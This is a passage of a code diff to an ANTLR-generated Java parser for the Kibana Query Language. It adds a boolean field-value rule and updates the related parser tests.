fieldName(); - setState(64); + setState(66); match(COLON); - setState(65); + setState(67); match(LEFT_CURLY_BRACKET); - setState(66); + setState(68); nestedSubQuery(0); - setState(67); + setState(69); match(RIGHT_CURLY_BRACKET); } } @@ -532,7 +533,7 @@ public NestedSubQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @Override public int getRuleIndex() { return RULE_nestedSubQuery; } - + public NestedSubQueryContext() { } public void copyFrom(NestedSubQueryContext ctx) { super.copyFrom(ctx); @@ -606,11 +607,11 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException _ctx = _localctx; _prevctx = _localctx; - setState(70); + setState(72); nestedSimpleSubQuery(); } _ctx.stop = _input.LT(-1); - setState(77); + setState(79); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -621,9 +622,9 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException { _localctx = new BooleanNestedQueryContext(new NestedSubQueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_nestedSubQuery); - setState(72); + setState(74); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(73); + setState(75); ((BooleanNestedQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { @@ -634,12 +635,12 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException _errHandler.reportMatch(this); consume(); } - setState(74); + setState(76); nestedSubQuery(2); } - } + } } - setState(79); + setState(81); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); } @@ -702,55 +703,55 @@ public final NestedSimpleSubQueryContext nestedSimpleSubQuery() throws Recogniti NestedSimpleSubQueryContext _localctx = new NestedSimpleSubQueryContext(_ctx, getState()); enterRule(_localctx, 12, RULE_nestedSimpleSubQuery); try { - setState(87); + setState(89); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,4,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(80); + setState(82); notQuery(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(81); + setState(83); nestedQuery(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(82); + setState(84); matchAllQuery(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(83); + setState(85); nestedParenthesizedQuery(); } break; 
case 5: enterOuterAlt(_localctx, 5); { - setState(84); + setState(86); existsQuery(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(85); + setState(87); rangeQuery(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(86); + setState(88); fieldQuery(); } break; @@ -799,11 +800,11 @@ public final NestedParenthesizedQueryContext nestedParenthesizedQuery() throws R try { enterOuterAlt(_localctx, 1); { - setState(89); + setState(91); match(LEFT_PARENTHESIS); - setState(90); + setState(92); nestedSubQuery(0); - setState(91); + setState(93); match(RIGHT_PARENTHESIS); } } @@ -850,19 +851,19 @@ public final MatchAllQueryContext matchAllQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(95); + setState(97); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,5,_ctx) ) { case 1: { - setState(93); + setState(95); match(WILDCARD); - setState(94); + setState(96); match(COLON); } break; } - setState(97); + setState(99); match(WILDCARD); } } @@ -909,11 +910,11 @@ public final ParenthesizedQueryContext parenthesizedQuery() throws RecognitionEx try { enterOuterAlt(_localctx, 1); { - setState(99); + setState(101); match(LEFT_PARENTHESIS); - setState(100); + setState(102); query(0); - setState(101); + setState(103); match(RIGHT_PARENTHESIS); } } @@ -967,9 +968,9 @@ public final RangeQueryContext rangeQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(103); + setState(105); fieldName(); - setState(104); + setState(106); ((RangeQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 960L) != 0)) ) { @@ -980,7 +981,7 @@ public final RangeQueryContext rangeQuery() throws RecognitionException { _errHandler.reportMatch(this); consume(); } - setState(105); + setState(107); rangeQueryValue(); } } @@ -1031,14 +1032,14 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio int _la; try { int _alt; - setState(113); + setState(115); _errHandler.sync(this); switch (_input.LA(1)) { case UNQUOTED_LITERAL: case WILDCARD: enterOuterAlt(_localctx, 1); { - setState(108); + setState(110); _errHandler.sync(this); _alt = 1; do { @@ -1046,7 +1047,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio case 1: { { - setState(107); + setState(109); _la = _input.LA(1); if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); @@ -1062,7 +1063,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio default: throw new NoViableAltException(this); } - setState(110); + setState(112); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,6,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); @@ -1071,7 +1072,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio case QUOTED_STRING: enterOuterAlt(_localctx, 2); { - setState(112); + setState(114); match(QUOTED_STRING); } break; @@ -1122,11 +1123,11 @@ public final ExistsQueryContext existsQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(115); + setState(117); fieldName(); - setState(116); + setState(118); match(COLON); - setState(117); + setState(119); match(WILDCARD); } } @@ -1150,8 +1151,6 @@ public FieldNameContext fieldName() { public FieldQueryValueContext fieldQueryValue() { return getRuleContext(FieldQueryValueContext.class,0); } - public TerminalNode LEFT_PARENTHESIS() { return 
getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } - public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1175,35 +1174,14 @@ public final FieldQueryContext fieldQuery() throws RecognitionException { FieldQueryContext _localctx = new FieldQueryContext(_ctx, getState()); enterRule(_localctx, 26, RULE_fieldQuery); try { - setState(129); - _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,8,_ctx) ) { - case 1: - enterOuterAlt(_localctx, 1); - { - setState(119); - fieldName(); - setState(120); - match(COLON); - setState(121); - fieldQueryValue(); - } - break; - case 2: - enterOuterAlt(_localctx, 2); - { - setState(123); - fieldName(); - setState(124); - match(COLON); - setState(125); - match(LEFT_PARENTHESIS); - setState(126); - fieldQueryValue(); - setState(127); - match(RIGHT_PARENTHESIS); - } - break; + enterOuterAlt(_localctx, 1); + { + setState(121); + fieldName(); + setState(122); + match(COLON); + setState(123); + fieldQueryValue(); } } catch (RecognitionException re) { @@ -1222,8 +1200,6 @@ public static class FieldLessQueryContext extends ParserRuleContext { public FieldQueryValueContext fieldQueryValue() { return getRuleContext(FieldQueryValueContext.class,0); } - public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } - public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldLessQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1247,34 +1223,10 @@ public final FieldLessQueryContext fieldLessQuery() throws RecognitionException FieldLessQueryContext _localctx = new FieldLessQueryContext(_ctx, getState()); enterRule(_localctx, 28, RULE_fieldLessQuery); try { - setState(136); - _errHandler.sync(this); - switch (_input.LA(1)) { - case AND: - case OR: - case NOT: - case UNQUOTED_LITERAL: - case QUOTED_STRING: - case WILDCARD: - enterOuterAlt(_localctx, 1); - { - setState(131); - fieldQueryValue(); - } - break; - case LEFT_PARENTHESIS: - enterOuterAlt(_localctx, 2); - { - setState(132); - match(LEFT_PARENTHESIS); - setState(133); - fieldQueryValue(); - setState(134); - match(RIGHT_PARENTHESIS); - } - break; - default: - throw new NoViableAltException(this); + enterOuterAlt(_localctx, 1); + { + setState(125); + fieldQueryValue(); } } catch (RecognitionException re) { @@ -1290,27 +1242,36 @@ public final FieldLessQueryContext fieldLessQuery() throws RecognitionException @SuppressWarnings("CheckReturnValue") public static class FieldQueryValueContext extends ParserRuleContext { - public List AND() { return getTokens(KqlBaseParser.AND); } - public TerminalNode AND(int i) { - return getToken(KqlBaseParser.AND, i); + public Token operator; + public List UNQUOTED_LITERAL() { return getTokens(KqlBaseParser.UNQUOTED_LITERAL); } + public TerminalNode UNQUOTED_LITERAL(int i) { + return getToken(KqlBaseParser.UNQUOTED_LITERAL, i); + } + public List WILDCARD() { return getTokens(KqlBaseParser.WILDCARD); } + public TerminalNode WILDCARD(int i) { + return getToken(KqlBaseParser.WILDCARD, i); } public List OR() { return getTokens(KqlBaseParser.OR); } public TerminalNode OR(int i) { return getToken(KqlBaseParser.OR, i); } + public List AND() { return getTokens(KqlBaseParser.AND); } + public TerminalNode AND(int i) { + return getToken(KqlBaseParser.AND, i); + } public List NOT() { return 
getTokens(KqlBaseParser.NOT); } public TerminalNode NOT(int i) { return getToken(KqlBaseParser.NOT, i); } - public List UNQUOTED_LITERAL() { return getTokens(KqlBaseParser.UNQUOTED_LITERAL); } - public TerminalNode UNQUOTED_LITERAL(int i) { - return getToken(KqlBaseParser.UNQUOTED_LITERAL, i); + public TerminalNode QUOTED_STRING() { return getToken(KqlBaseParser.QUOTED_STRING, 0); } + public FieldQueryValueContext fieldQueryValue() { + return getRuleContext(FieldQueryValueContext.class,0); } - public List WILDCARD() { return getTokens(KqlBaseParser.WILDCARD); } - public TerminalNode WILDCARD(int i) { - return getToken(KqlBaseParser.WILDCARD, i); + public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } + public BooleanFieldQueryValueContext booleanFieldQueryValue() { + return getRuleContext(BooleanFieldQueryValueContext.class,0); } - public TerminalNode QUOTED_STRING() { return getToken(KqlBaseParser.QUOTED_STRING, 0); } + public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldQueryValueContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1336,20 +1297,53 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio int _la; try { int _alt; - setState(158); + setState(157); _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,15,_ctx) ) { + switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(139); + setState(128); + _errHandler.sync(this); + _alt = 1; + do { + switch (_alt) { + case 1: + { + { + setState(127); + _la = _input.LA(1); + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + break; + default: + throw new NoViableAltException(this); + } + setState(130); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,8,_ctx); + } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); + } + break; + case 2: + enterOuterAlt(_localctx, 2); + { + setState(133); _errHandler.sync(this); _la = _input.LA(1); - if ((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) { + if (_la==UNQUOTED_LITERAL || _la==WILDCARD) { { - setState(138); + setState(132); _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); } else { @@ -1360,7 +1354,7 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio } } - setState(142); + setState(136); _errHandler.sync(this); _alt = 1; do { @@ -1368,9 +1362,42 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio case 1: { { - setState(141); + setState(135); _la = _input.LA(1); - if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { + if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + break; + default: + throw new NoViableAltException(this); + } + setState(138); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,10,_ctx); + } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); + } + break; + case 3: + enterOuterAlt(_localctx, 3); + { + setState(141); + 
_errHandler.sync(this); + _alt = 1; + do { + switch (_alt) { + case 1: + { + { + setState(140); + _la = _input.LA(1); + if ( !(_la==AND || _la==OR) ) { _errHandler.recoverInline(this); } else { @@ -1384,18 +1411,18 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio default: throw new NoViableAltException(this); } - setState(144); + setState(143); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,11,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); - setState(147); + setState(146); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,12,_ctx) ) { case 1: { - setState(146); + setState(145); _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); } else { @@ -1408,71 +1435,156 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio } } break; - case 2: - enterOuterAlt(_localctx, 2); + case 4: + enterOuterAlt(_localctx, 4); { - setState(149); - _la = _input.LA(1); - if ( !(_la==AND || _la==OR) ) { - _errHandler.recoverInline(this); - } - else { - if ( _input.LA(1)==Token.EOF ) matchedEOF = true; - _errHandler.reportMatch(this); - consume(); + setState(148); + match(QUOTED_STRING); } + break; + case 5: + enterOuterAlt(_localctx, 5); + { + setState(149); + ((FieldQueryValueContext)_localctx).operator = match(NOT); setState(151); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,13,_ctx) ) { case 1: { setState(150); - _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { - _errHandler.recoverInline(this); - } - else { - if ( _input.LA(1)==Token.EOF ) matchedEOF = true; - _errHandler.reportMatch(this); - consume(); - } + fieldQueryValue(); } break; } } break; - case 3: - enterOuterAlt(_localctx, 3); + case 6: + enterOuterAlt(_localctx, 6); { setState(153); - match(NOT); + match(LEFT_PARENTHESIS); + setState(154); + booleanFieldQueryValue(0); setState(155); - _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { - case 1: + match(RIGHT_PARENTHESIS); + } + break; + } + } + catch (RecognitionException re) { + _localctx.exception = re; + _errHandler.reportError(this, re); + _errHandler.recover(this, re); + } + finally { + exitRule(); + } + return _localctx; + } + + @SuppressWarnings("CheckReturnValue") + public static class BooleanFieldQueryValueContext extends ParserRuleContext { + public Token operator; + public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } + public BooleanFieldQueryValueContext booleanFieldQueryValue() { + return getRuleContext(BooleanFieldQueryValueContext.class,0); + } + public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } + public FieldQueryValueContext fieldQueryValue() { + return getRuleContext(FieldQueryValueContext.class,0); + } + public TerminalNode AND() { return getToken(KqlBaseParser.AND, 0); } + public TerminalNode OR() { return getToken(KqlBaseParser.OR, 0); } + public BooleanFieldQueryValueContext(ParserRuleContext parent, int invokingState) { + super(parent, invokingState); + } + @Override public int getRuleIndex() { return RULE_booleanFieldQueryValue; } + @Override + public void enterRule(ParseTreeListener listener) { + if ( listener instanceof KqlBaseListener ) ((KqlBaseListener)listener).enterBooleanFieldQueryValue(this); + } + @Override + public 
void exitRule(ParseTreeListener listener) { + if ( listener instanceof KqlBaseListener ) ((KqlBaseListener)listener).exitBooleanFieldQueryValue(this); + } + @Override + public T accept(ParseTreeVisitor visitor) { + if ( visitor instanceof KqlBaseVisitor ) return ((KqlBaseVisitor)visitor).visitBooleanFieldQueryValue(this); + else return visitor.visitChildren(this); + } + } + + public final BooleanFieldQueryValueContext booleanFieldQueryValue() throws RecognitionException { + return booleanFieldQueryValue(0); + } + + private BooleanFieldQueryValueContext booleanFieldQueryValue(int _p) throws RecognitionException { + ParserRuleContext _parentctx = _ctx; + int _parentState = getState(); + BooleanFieldQueryValueContext _localctx = new BooleanFieldQueryValueContext(_ctx, _parentState); + BooleanFieldQueryValueContext _prevctx = _localctx; + int _startState = 32; + enterRecursionRule(_localctx, 32, RULE_booleanFieldQueryValue, _p); + int _la; + try { + int _alt; + enterOuterAlt(_localctx, 1); + { + setState(165); + _errHandler.sync(this); + switch ( getInterpreter().adaptivePredict(_input,15,_ctx) ) { + case 1: + { + setState(160); + match(LEFT_PARENTHESIS); + setState(161); + booleanFieldQueryValue(0); + setState(162); + match(RIGHT_PARENTHESIS); + } + break; + case 2: + { + setState(164); + fieldQueryValue(); + } + break; + } + _ctx.stop = _input.LT(-1); + setState(172); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,16,_ctx); + while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { + if ( _alt==1 ) { + if ( _parseListeners!=null ) triggerExitRuleEvent(); + _prevctx = _localctx; { - setState(154); + { + _localctx = new BooleanFieldQueryValueContext(_parentctx, _parentState); + pushNewRecursionContext(_localctx, _startState, RULE_booleanFieldQueryValue); + setState(167); + if (!(precpred(_ctx, 3))) throw new FailedPredicateException(this, "precpred(_ctx, 3)"); + setState(168); + ((BooleanFieldQueryValueContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { - _errHandler.recoverInline(this); + ((BooleanFieldQueryValueContext)_localctx).operator = (Token)_errHandler.recoverInline(this); } else { if ( _input.LA(1)==Token.EOF ) matchedEOF = true; _errHandler.reportMatch(this); consume(); } + setState(169); + fieldQueryValue(); } - break; - } - } - break; - case 4: - enterOuterAlt(_localctx, 4); - { - setState(157); - match(QUOTED_STRING); + } } - break; + setState(174); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,16,_ctx); + } } } catch (RecognitionException re) { @@ -1481,7 +1593,7 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio _errHandler.recover(this, re); } finally { - exitRule(); + unrollRecursionContexts(_parentctx); } return _localctx; } @@ -1513,29 +1625,29 @@ public T accept(ParseTreeVisitor visitor) { public final FieldNameContext fieldName() throws RecognitionException { FieldNameContext _localctx = new FieldNameContext(_ctx, getState()); - enterRule(_localctx, 32, RULE_fieldName); + enterRule(_localctx, 34, RULE_fieldName); try { - setState(163); + setState(178); _errHandler.sync(this); switch (_input.LA(1)) { case UNQUOTED_LITERAL: enterOuterAlt(_localctx, 1); { - setState(160); + setState(175); ((FieldNameContext)_localctx).value = match(UNQUOTED_LITERAL); } break; case QUOTED_STRING: enterOuterAlt(_localctx, 2); { - setState(161); + setState(176); ((FieldNameContext)_localctx).value = match(QUOTED_STRING); } break; case 
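The `booleanFieldQueryValue(int _p)` method above is ANTLR's standard rewrite of the left-recursive rule `booleanFieldQueryValue : booleanFieldQueryValue (AND | OR) fieldQueryValue | '(' booleanFieldQueryValue ')' | fieldQueryValue`: it parses one primary alternative, then loops, folding each trailing `(AND | OR) fieldQueryValue` into a left-associative tree for as long as the `precpred(_ctx, 3)` predicate holds. A minimal hand-written sketch of the same control flow (illustrative only, not the generated code; the token and node names are invented for the example):

```java
import java.util.List;

// Sketch of ANTLR's left-recursion elimination for a single-precedence
// boolean rule: parse a primary, then fold trailing "op primary" pairs.
final class BooleanValueParserSketch {
    sealed interface Node permits Leaf, Op {}
    record Leaf(String token) implements Node {}
    record Op(String operator, Node left, Node right) implements Node {}

    private final List<String> tokens;
    private int pos;

    BooleanValueParserSketch(List<String> tokens) {
        this.tokens = tokens;
    }

    Node parse() {
        Node left = parsePrimary();
        // Counterpart of the adaptivePredict/while loop in booleanFieldQueryValue(int _p).
        while (pos < tokens.size() && (tokens.get(pos).equals("AND") || tokens.get(pos).equals("OR"))) {
            String operator = tokens.get(pos++);
            left = new Op(operator, left, parsePrimary()); // left-associative fold
        }
        return left;
    }

    private Node parsePrimary() {
        if (tokens.get(pos).equals("(")) {
            pos++; // consume '('
            Node inner = parse();
            pos++; // consume ')'
            return inner;
        }
        return new Leaf(tokens.get(pos++)); // a plain fieldQueryValue
    }

    public static void main(String[] args) {
        // AND and OR share one precedence level in this rule, so operators
        // fold left-to-right: ((foo OR bar) AND baz).
        System.out.println(new BooleanValueParserSketch(List.of("foo", "OR", "bar", "AND", "baz")).parse());
    }
}
```

This left-to-right fold is exactly the shape that `testBooleanFieldQueries` further down asserts for `(foo or bar and baz)`.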
WILDCARD: enterOuterAlt(_localctx, 3); { - setState(162); + setState(177); ((FieldNameContext)_localctx).value = match(WILDCARD); } break; @@ -1560,6 +1672,8 @@ public boolean sempred(RuleContext _localctx, int ruleIndex, int predIndex) { return query_sempred((QueryContext)_localctx, predIndex); case 5: return nestedSubQuery_sempred((NestedSubQueryContext)_localctx, predIndex); + case 16: + return booleanFieldQueryValue_sempred((BooleanFieldQueryValueContext)_localctx, predIndex); } return true; } @@ -1577,111 +1691,129 @@ private boolean nestedSubQuery_sempred(NestedSubQueryContext _localctx, int pred } return true; } + private boolean booleanFieldQueryValue_sempred(BooleanFieldQueryValueContext _localctx, int predIndex) { + switch (predIndex) { + case 2: + return precpred(_ctx, 3); + } + return true; + } public static final String _serializedATN = - "\u0004\u0001\u0010\u00a6\u0002\u0000\u0007\u0000\u0002\u0001\u0007\u0001"+ + "\u0004\u0001\u0010\u00b5\u0002\u0000\u0007\u0000\u0002\u0001\u0007\u0001"+ "\u0002\u0002\u0007\u0002\u0002\u0003\u0007\u0003\u0002\u0004\u0007\u0004"+ "\u0002\u0005\u0007\u0005\u0002\u0006\u0007\u0006\u0002\u0007\u0007\u0007"+ "\u0002\b\u0007\b\u0002\t\u0007\t\u0002\n\u0007\n\u0002\u000b\u0007\u000b"+ "\u0002\f\u0007\f\u0002\r\u0007\r\u0002\u000e\u0007\u000e\u0002\u000f\u0007"+ - "\u000f\u0002\u0010\u0007\u0010\u0001\u0000\u0003\u0000$\b\u0000\u0001"+ - "\u0000\u0001\u0000\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0001"+ - "\u0001\u0001\u0001\u0005\u0001.\b\u0001\n\u0001\f\u00011\t\u0001\u0001"+ - "\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001"+ - "\u0002\u0001\u0002\u0003\u0002;\b\u0002\u0001\u0003\u0001\u0003\u0001"+ - "\u0003\u0001\u0004\u0001\u0004\u0001\u0004\u0001\u0004\u0001\u0004\u0001"+ - "\u0004\u0001\u0005\u0001\u0005\u0001\u0005\u0001\u0005\u0001\u0005\u0001"+ - "\u0005\u0005\u0005L\b\u0005\n\u0005\f\u0005O\t\u0005\u0001\u0006\u0001"+ - "\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0003"+ - "\u0006X\b\u0006\u0001\u0007\u0001\u0007\u0001\u0007\u0001\u0007\u0001"+ - "\b\u0001\b\u0003\b`\b\b\u0001\b\u0001\b\u0001\t\u0001\t\u0001\t\u0001"+ - "\t\u0001\n\u0001\n\u0001\n\u0001\n\u0001\u000b\u0004\u000bm\b\u000b\u000b"+ - "\u000b\f\u000bn\u0001\u000b\u0003\u000br\b\u000b\u0001\f\u0001\f\u0001"+ - "\f\u0001\f\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001"+ - "\r\u0001\r\u0001\r\u0003\r\u0082\b\r\u0001\u000e\u0001\u000e\u0001\u000e"+ - "\u0001\u000e\u0001\u000e\u0003\u000e\u0089\b\u000e\u0001\u000f\u0003\u000f"+ - "\u008c\b\u000f\u0001\u000f\u0004\u000f\u008f\b\u000f\u000b\u000f\f\u000f"+ - "\u0090\u0001\u000f\u0003\u000f\u0094\b\u000f\u0001\u000f\u0001\u000f\u0003"+ - "\u000f\u0098\b\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u009c\b\u000f"+ - "\u0001\u000f\u0003\u000f\u009f\b\u000f\u0001\u0010\u0001\u0010\u0001\u0010"+ - "\u0003\u0010\u00a4\b\u0010\u0001\u0010\u0000\u0002\u0002\n\u0011\u0000"+ - "\u0002\u0004\u0006\b\n\f\u000e\u0010\u0012\u0014\u0016\u0018\u001a\u001c"+ - "\u001e \u0000\u0004\u0001\u0000\u0002\u0003\u0001\u0000\u0006\t\u0002"+ - "\u0000\u000e\u000e\u0010\u0010\u0001\u0000\u0002\u0004\u00b3\u0000#\u0001"+ - "\u0000\u0000\u0000\u0002\'\u0001\u0000\u0000\u0000\u0004:\u0001\u0000"+ - "\u0000\u0000\u0006<\u0001\u0000\u0000\u0000\b?\u0001\u0000\u0000\u0000"+ - "\nE\u0001\u0000\u0000\u0000\fW\u0001\u0000\u0000\u0000\u000eY\u0001\u0000"+ - "\u0000\u0000\u0010_\u0001\u0000\u0000\u0000\u0012c\u0001\u0000\u0000\u0000"+ - 
"\u0014g\u0001\u0000\u0000\u0000\u0016q\u0001\u0000\u0000\u0000\u0018s"+ - "\u0001\u0000\u0000\u0000\u001a\u0081\u0001\u0000\u0000\u0000\u001c\u0088"+ - "\u0001\u0000\u0000\u0000\u001e\u009e\u0001\u0000\u0000\u0000 \u00a3\u0001"+ - "\u0000\u0000\u0000\"$\u0003\u0002\u0001\u0000#\"\u0001\u0000\u0000\u0000"+ - "#$\u0001\u0000\u0000\u0000$%\u0001\u0000\u0000\u0000%&\u0005\u0000\u0000"+ - "\u0001&\u0001\u0001\u0000\u0000\u0000\'(\u0006\u0001\uffff\uffff\u0000"+ - "()\u0003\u0004\u0002\u0000)/\u0001\u0000\u0000\u0000*+\n\u0002\u0000\u0000"+ - "+,\u0007\u0000\u0000\u0000,.\u0003\u0002\u0001\u0002-*\u0001\u0000\u0000"+ - "\u0000.1\u0001\u0000\u0000\u0000/-\u0001\u0000\u0000\u0000/0\u0001\u0000"+ - "\u0000\u00000\u0003\u0001\u0000\u0000\u00001/\u0001\u0000\u0000\u0000"+ - "2;\u0003\u0006\u0003\u00003;\u0003\b\u0004\u00004;\u0003\u0012\t\u0000"+ - "5;\u0003\u0010\b\u00006;\u0003\u0018\f\u00007;\u0003\u0014\n\u00008;\u0003"+ - "\u001a\r\u00009;\u0003\u001c\u000e\u0000:2\u0001\u0000\u0000\u0000:3\u0001"+ - "\u0000\u0000\u0000:4\u0001\u0000\u0000\u0000:5\u0001\u0000\u0000\u0000"+ - ":6\u0001\u0000\u0000\u0000:7\u0001\u0000\u0000\u0000:8\u0001\u0000\u0000"+ - "\u0000:9\u0001\u0000\u0000\u0000;\u0005\u0001\u0000\u0000\u0000<=\u0005"+ - "\u0004\u0000\u0000=>\u0003\u0004\u0002\u0000>\u0007\u0001\u0000\u0000"+ - "\u0000?@\u0003 \u0010\u0000@A\u0005\u0005\u0000\u0000AB\u0005\f\u0000"+ - "\u0000BC\u0003\n\u0005\u0000CD\u0005\r\u0000\u0000D\t\u0001\u0000\u0000"+ - "\u0000EF\u0006\u0005\uffff\uffff\u0000FG\u0003\f\u0006\u0000GM\u0001\u0000"+ - "\u0000\u0000HI\n\u0002\u0000\u0000IJ\u0007\u0000\u0000\u0000JL\u0003\n"+ - "\u0005\u0002KH\u0001\u0000\u0000\u0000LO\u0001\u0000\u0000\u0000MK\u0001"+ - "\u0000\u0000\u0000MN\u0001\u0000\u0000\u0000N\u000b\u0001\u0000\u0000"+ - "\u0000OM\u0001\u0000\u0000\u0000PX\u0003\u0006\u0003\u0000QX\u0003\b\u0004"+ - "\u0000RX\u0003\u0010\b\u0000SX\u0003\u000e\u0007\u0000TX\u0003\u0018\f"+ - "\u0000UX\u0003\u0014\n\u0000VX\u0003\u001a\r\u0000WP\u0001\u0000\u0000"+ - "\u0000WQ\u0001\u0000\u0000\u0000WR\u0001\u0000\u0000\u0000WS\u0001\u0000"+ - "\u0000\u0000WT\u0001\u0000\u0000\u0000WU\u0001\u0000\u0000\u0000WV\u0001"+ - "\u0000\u0000\u0000X\r\u0001\u0000\u0000\u0000YZ\u0005\n\u0000\u0000Z["+ - "\u0003\n\u0005\u0000[\\\u0005\u000b\u0000\u0000\\\u000f\u0001\u0000\u0000"+ - "\u0000]^\u0005\u0010\u0000\u0000^`\u0005\u0005\u0000\u0000_]\u0001\u0000"+ - "\u0000\u0000_`\u0001\u0000\u0000\u0000`a\u0001\u0000\u0000\u0000ab\u0005"+ - "\u0010\u0000\u0000b\u0011\u0001\u0000\u0000\u0000cd\u0005\n\u0000\u0000"+ - "de\u0003\u0002\u0001\u0000ef\u0005\u000b\u0000\u0000f\u0013\u0001\u0000"+ - "\u0000\u0000gh\u0003 \u0010\u0000hi\u0007\u0001\u0000\u0000ij\u0003\u0016"+ - "\u000b\u0000j\u0015\u0001\u0000\u0000\u0000km\u0007\u0002\u0000\u0000"+ - "lk\u0001\u0000\u0000\u0000mn\u0001\u0000\u0000\u0000nl\u0001\u0000\u0000"+ - "\u0000no\u0001\u0000\u0000\u0000or\u0001\u0000\u0000\u0000pr\u0005\u000f"+ - "\u0000\u0000ql\u0001\u0000\u0000\u0000qp\u0001\u0000\u0000\u0000r\u0017"+ - 